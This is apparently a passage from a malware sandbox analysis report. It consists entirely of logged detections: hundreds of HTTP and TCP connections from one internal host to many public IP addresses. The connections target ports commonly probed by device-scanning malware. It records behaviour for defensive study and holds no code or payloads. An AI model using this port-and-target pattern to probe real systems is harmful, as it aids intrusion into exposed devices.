                            Source: unknownNetwork traffic detected: HTTP traffic on port 39348 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56050 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60678 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38752 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54166 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43390 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48328 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53268 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48672 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43596 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60798 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48668 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41596 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52134 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43492 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57628 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35586 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40688 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45994 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38308 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33546 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34754 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43214 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52728 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59292 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55938 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43866 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60554 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51138 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57974 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47054 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55244 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59684 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53326 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59850 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34950 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42036 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41868 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45392 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45632 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53164 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38622 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57494 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57780 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60110 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58306 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43794 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55160 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47708 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58938 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43248 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54082 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34328 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43998 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51910 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44266 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35850 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52562 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38582 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55988 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37274 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54184 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37506 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45864 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41990 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42846 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40164 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34598 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55110 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36818 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48712 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36564 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48106 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58156 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42708 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39578 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35576 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60924 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52700 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40232 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55648 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44432 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33012 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46500 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43048 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39882 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55180 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44056 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56264 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37160 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48330 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35060 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59712 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57816 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60400 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38148 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38580 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59584 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35474 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33648 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44528 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58242 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40580 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36058 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58002 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42528 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46286 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47156 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56316 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34238 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38530 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50966 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47942 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34716 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43088 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42632 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49500 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41238 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40682 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46138 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48772 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39324 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52278 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45440 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35368 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41932 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35718 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57012 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55064 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42904 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42350 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60458 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52488 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53836 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46634 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43014 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45622 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52776 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44658 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48362 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51630 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36688 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35872 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37084 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38894 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48866 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55176 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40326 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42862 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36844 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48404 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49056 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38952 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48022 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41590 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44284 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56568 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53868 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60970 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56124 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38148 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 7574
                            Source: global trafficTCP traffic: 192.168.2.23:55170 -> 178.25.78.182:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44208 -> 73.28.144.173:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33862 -> 113.94.133.170:7574
                            Source: global trafficTCP traffic: 192.168.2.23:57246 -> 119.215.99.156:5555
                            Source: global trafficTCP traffic: 192.168.2.23:50476 -> 90.232.155.185:8443
                            Source: global trafficTCP traffic: 192.168.2.23:34956 -> 111.78.196.116:8443
                            Source: global trafficTCP traffic: 192.168.2.23:42656 -> 26.11.196.70:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53386 -> 58.189.121.169:52869
                            Source: global trafficTCP traffic: 192.168.2.23:37290 -> 35.200.178.13:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53460 -> 137.40.92.251:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56412 -> 18.82.236.106:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53152 -> 32.54.226.30:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46644 -> 7.29.11.132:5555
                            Source: global trafficTCP traffic: 192.168.2.23:56416 -> 131.62.122.210:37215
                            Source: global trafficTCP traffic: 192.168.2.23:32770 -> 70.172.81.219:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56786 -> 55.77.110.137:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49462 -> 171.23.177.240:49152
                            Source: global trafficTCP traffic: 192.168.2.23:42460 -> 96.204.93.246:5555
                            Source: global trafficTCP traffic: 192.168.2.23:34158 -> 6.205.85.158:49152
                            Source: global trafficTCP traffic: 192.168.2.23:55426 -> 167.233.55.65:8443
                            Source: global trafficTCP traffic: 192.168.2.23:37036 -> 212.35.88.79:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34592 -> 25.75.205.173:5555
                            Source: global trafficTCP traffic: 192.168.2.23:48832 -> 106.222.158.5:52869
                            Source: global trafficTCP traffic: 192.168.2.23:41512 -> 209.219.134.7:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49896 -> 126.106.74.156:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48810 -> 59.230.90.160:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53088 -> 68.228.150.77:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60062 -> 153.58.49.72:8443
                            Source: global trafficTCP traffic: 192.168.2.23:35598 -> 216.85.193.21:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54916 -> 167.15.35.246:7574
                            Source: global trafficTCP traffic: 192.168.2.23:52194 -> 134.224.138.24:7574
                            Source: global trafficTCP traffic: 192.168.2.23:40736 -> 31.23.54.208:7574
                            Source: global trafficTCP traffic: 192.168.2.23:54474 -> 170.93.179.178:7574
                            Source: global trafficTCP traffic: 192.168.2.23:39080 -> 196.155.214.59:5555
                            Source: global trafficTCP traffic: 192.168.2.23:37876 -> 46.35.54.91:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43238 -> 126.156.202.140:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56834 -> 152.0.87.200:52869
                            Source: global trafficTCP traffic: 192.168.2.23:49334 -> 75.31.109.126:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51128 -> 170.251.163.52:5555
                            Source: global trafficTCP traffic: 192.168.2.23:35764 -> 9.31.4.141:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47196 -> 100.49.226.162:52869
                            Source: global trafficTCP traffic: 192.168.2.23:51090 -> 205.3.224.6:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60498 -> 68.101.86.227:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50342 -> 83.88.254.107:37215
                            Source: global trafficTCP traffic: 192.168.2.23:47266 -> 3.111.24.133:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34698 -> 124.127.132.57:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50164 -> 1.186.33.126:81
                            Source: global trafficTCP traffic: 192.168.2.23:54360 -> 220.234.56.30:49152
                            Source: global trafficTCP traffic: 192.168.2.23:36598 -> 152.206.32.137:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60268 -> 128.39.179.200:52869
                            Source: global trafficTCP traffic: 192.168.2.23:49382 -> 94.141.19.222:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40872 -> 186.13.210.162:81
                            Source: global trafficTCP traffic: 192.168.2.23:58788 -> 151.95.79.143:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37558 -> 62.73.130.24:81
                            Source: global trafficTCP traffic: 192.168.2.23:50614 -> 215.230.56.175:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50966 -> 202.214.164.77:49152
                            Source: global trafficTCP traffic: 192.168.2.23:34526 -> 68.169.46.188:52869
                            Source: global trafficTCP traffic: 192.168.2.23:44616 -> 222.239.189.68:5555
                            Source: global trafficTCP traffic: 192.168.2.23:36296 -> 24.168.141.210:52869
                            Source: global trafficTCP traffic: 192.168.2.23:56402 -> 45.49.121.237:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49388 -> 157.116.73.7:7574
                            Source: global trafficTCP traffic: 192.168.2.23:46276 -> 60.61.74.47:52869
                            Source: global trafficTCP traffic: 192.168.2.23:38626 -> 137.6.145.87:5555
                            Source: global trafficTCP traffic: 192.168.2.23:34686 -> 1.162.198.242:81
                            Source: global trafficTCP traffic: 192.168.2.23:35766 -> 91.91.58.110:37215
                            Source: global trafficTCP traffic: 192.168.2.23:43986 -> 85.206.232.118:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59794 -> 45.90.89.27:7574
                            Source: global trafficTCP traffic: 192.168.2.23:38618 -> 126.210.97.150:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34374 -> 212.60.199.113:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54792 -> 114.177.103.150:7574
                            Source: global trafficTCP traffic: 192.168.2.23:55294 -> 99.219.59.203:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49030 -> 9.179.110.111:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34472 -> 89.109.61.141:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60714 -> 207.79.150.234:5555
                            Source: global trafficTCP traffic: 192.168.2.23:36122 -> 14.204.207.237:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39620 -> 165.207.49.112:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36632 -> 121.14.239.14:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52560 -> 153.118.180.181:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44238 -> 197.179.152.198:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53554 -> 159.157.115.126:81
                            Source: global trafficTCP traffic: 192.168.2.23:40020 -> 173.220.217.199:5555
                            Source: global trafficTCP traffic: 192.168.2.23:50714 -> 122.1.248.27:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39706 -> 152.127.1.190:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56148 -> 16.160.29.25:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33192 -> 25.76.24.63:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55006 -> 163.122.132.187:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34654 -> 37.67.31.21:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33618 -> 177.71.61.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44322 -> 54.197.126.116:49152
                            Source: global trafficTCP traffic: 192.168.2.23:56664 -> 165.72.140.124:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37722 -> 52.160.156.2:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52506 -> 170.254.161.26:49152
                            Source: global trafficTCP traffic: 192.168.2.23:35628 -> 178.233.21.105:52869
                            Source: global trafficTCP traffic: 192.168.2.23:48112 -> 108.29.185.40:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60778 -> 65.64.113.148:8443
                            Source: global trafficTCP traffic: 192.168.2.23:42750 -> 114.220.234.17:7574
                            Source: global trafficTCP traffic: 192.168.2.23:36116 -> 3.195.8.90:7574
                            Source: global trafficTCP traffic: 192.168.2.23:48768 -> 144.199.162.100:8443
                            Source: global trafficTCP traffic: 192.168.2.23:47082 -> 103.107.221.247:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51822 -> 120.121.182.155:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53434 -> 169.189.175.4:37215
                            Source: global trafficTCP traffic: 192.168.2.23:36702 -> 82.114.241.74:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42466 -> 88.31.166.235:8443
                            Source: global trafficTCP traffic: 192.168.2.23:46204 -> 153.97.17.195:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48570 -> 123.86.59.14:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49820 -> 71.247.65.155:81
                            Source: global trafficTCP traffic: 192.168.2.23:40158 -> 74.42.253.221:49152
                            Source: global trafficTCP traffic: 192.168.2.23:50094 -> 4.167.134.165:8443
                            Source: global trafficTCP traffic: 192.168.2.23:43418 -> 132.20.246.253:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34658 -> 11.77.239.14:81
                            Source: global trafficTCP traffic: 192.168.2.23:48726 -> 191.33.92.105:5555
                            Source: global trafficTCP traffic: 192.168.2.23:39538 -> 111.150.127.171:52869
                            Source: global trafficTCP traffic: 192.168.2.23:55572 -> 97.41.245.225:8443
                            Source: global trafficTCP traffic: 192.168.2.23:33374 -> 90.1.191.80:81
                            Source: global trafficTCP traffic: 192.168.2.23:53692 -> 67.203.48.57:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53010 -> 12.79.183.254:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57482 -> 43.138.7.234:8080
                            Source: global trafficTCP traffic: 192.168.2.23:38900 -> 167.201.110.208:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55508 -> 184.76.229.89:7574
                            Source: global trafficTCP traffic: 192.168.2.23:59782 -> 2.144.168.159:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49878 -> 136.58.228.44:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58492 -> 81.241.101.2:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58306 -> 102.6.12.154:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48422 -> 13.35.2.160:8080
                            Source: global trafficTCP traffic: 192.168.2.23:32944 -> 99.104.75.94:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39008 -> 77.70.97.131:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50698 -> 74.198.143.219:81
                            Source: global trafficTCP traffic: 192.168.2.23:34298 -> 97.91.236.206:52869
                            Source: global trafficTCP traffic: 192.168.2.23:36608 -> 204.245.153.171:81
                            Source: global trafficTCP traffic: 192.168.2.23:47068 -> 32.115.244.125:8443
                            Source: global trafficTCP traffic: 192.168.2.23:44886 -> 101.189.50.38:52869
                            Source: global trafficTCP traffic: 192.168.2.23:39688 -> 147.130.7.228:81
                            Source: global trafficTCP traffic: 192.168.2.23:40018 -> 175.170.71.155:49152
                            Source: global trafficTCP traffic: 192.168.2.23:35312 -> 84.108.181.121:37215
                            Source: global trafficTCP traffic: 192.168.2.23:53158 -> 54.104.73.193:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35408 -> 61.123.81.243:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52432 -> 159.99.163.111:7574
                            Source: global trafficTCP traffic: 192.168.2.23:43402 -> 33.93.201.252:37215
                            Source: global trafficTCP traffic: 192.168.2.23:34066 -> 64.173.83.170:5555
                            Source: global trafficTCP traffic: 192.168.2.23:56088 -> 186.96.78.186:49152
                            Source: global trafficTCP traffic: 192.168.2.23:59688 -> 166.249.145.160:5555
                            Source: global trafficTCP traffic: 192.168.2.23:37608 -> 73.230.184.19:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50660 -> 114.117.212.4:49152
                            Source: global trafficTCP traffic: 192.168.2.23:48846 -> 114.17.69.181:5555
                            Source: global trafficTCP traffic: 192.168.2.23:60010 -> 49.64.3.244:81
                            Source: global trafficTCP traffic: 192.168.2.23:44670 -> 106.43.212.137:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55030 -> 35.184.146.118:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49060 -> 121.95.76.250:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59674 -> 8.189.90.201:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44448 -> 203.238.209.21:5555
                            Source: global trafficTCP traffic: 192.168.2.23:52900 -> 143.207.148.54:49152
                            Source: global trafficTCP traffic: 192.168.2.23:41564 -> 92.194.65.27:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43532 -> 153.64.107.165:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60140 -> 210.126.43.16:8443
                            Source: global trafficTCP traffic: 192.168.2.23:45422 -> 158.228.53.169:7574
                            Source: global trafficTCP traffic: 192.168.2.23:48626 -> 107.201.204.124:49152
                            Source: global trafficTCP traffic: 192.168.2.23:58462 -> 170.20.179.231:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45656 -> 109.55.98.37:81
                            Source: global trafficTCP traffic: 192.168.2.23:54742 -> 56.59.56.49:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45596 -> 158.60.86.218:7574
                            Source: global trafficTCP traffic: 192.168.2.23:43880 -> 191.213.172.77:7574
                            Source: global trafficTCP traffic: 192.168.2.23:33748 -> 33.12.176.23:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43958 -> 128.118.97.120:37215
                            Source: global trafficTCP traffic: 192.168.2.23:50332 -> 116.81.240.7:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39428 -> 163.197.220.203:49152
                            Source: global trafficTCP traffic: 192.168.2.23:48312 -> 38.198.165.69:7574
                            Source: global trafficTCP traffic: 192.168.2.23:41518 -> 169.158.193.51:37215
                            Source: global trafficTCP traffic: 192.168.2.23:47412 -> 28.196.179.23:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57454 -> 151.37.141.215:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40154 -> 99.216.95.166:5555
                            Source: global trafficTCP traffic: 192.168.2.23:40196 -> 22.57.27.162:81
                            Source: global trafficTCP traffic: 192.168.2.23:45114 -> 171.119.20.118:49152
                            Source: global trafficTCP traffic: 192.168.2.23:59424 -> 36.64.74.203:49152
                            Source: global trafficTCP traffic: 192.168.2.23:46996 -> 136.27.141.23:8080
                            Source: global trafficTCP traffic: 192.168.2.23:58364 -> 108.165.239.251:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57430 -> 109.90.191.175:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60754 -> 45.112.243.18:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56202 -> 217.163.66.130:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41272 -> 155.166.245.196:81
                            Source: global trafficTCP traffic: 192.168.2.23:57024 -> 24.158.93.235:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45016 -> 19.161.254.98:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46042 -> 193.206.30.210:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42548 -> 196.25.40.24:81
                            Source: global trafficTCP traffic: 192.168.2.23:59760 -> 24.19.154.251:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45072 -> 209.161.87.32:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60776 -> 15.182.172.18:5555
                            Source: global trafficTCP traffic: 192.168.2.23:49042 -> 142.0.210.253:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36838 -> 212.96.105.171:8080
